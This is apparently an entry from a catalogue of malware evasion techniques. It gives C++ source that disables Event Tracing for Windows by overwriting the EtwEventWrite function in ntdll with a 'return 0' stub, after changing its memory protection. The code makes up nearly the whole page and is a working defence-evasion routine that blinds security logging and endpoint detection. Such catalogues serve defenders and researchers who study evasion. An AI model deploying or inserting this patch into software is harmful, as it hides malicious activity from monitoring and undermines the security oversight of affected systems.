C++ / Disabling Event Tracing for Windows (ETW)

Windows C++ / Disabling Event Tracing for Windows (ETW)

Author	Unprotect
Platform	Windows
Language	C++
Technique	Disabling Event Tracing for Windows (ETW)

Description:

Snippet source code from @_vivami

Code

void disableETW(void) {
	// return 0
	unsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret
	
	ULONG oldprotect = 0;
	size_t size = sizeof(patch);
	
	HANDLE hCurrentProc = GetCurrentProcess();
	
	unsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };
	
	void *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);
	
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);
	
	memcpy(pEventWrite, patch, size / sizeof(patch[0]));
	
	NtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);
	FlushInstructionCache(hCurrentProc, pEventWrite, size);
	
}

Download Raw

Created

April 19, 2022

Last Revised

April 22, 2024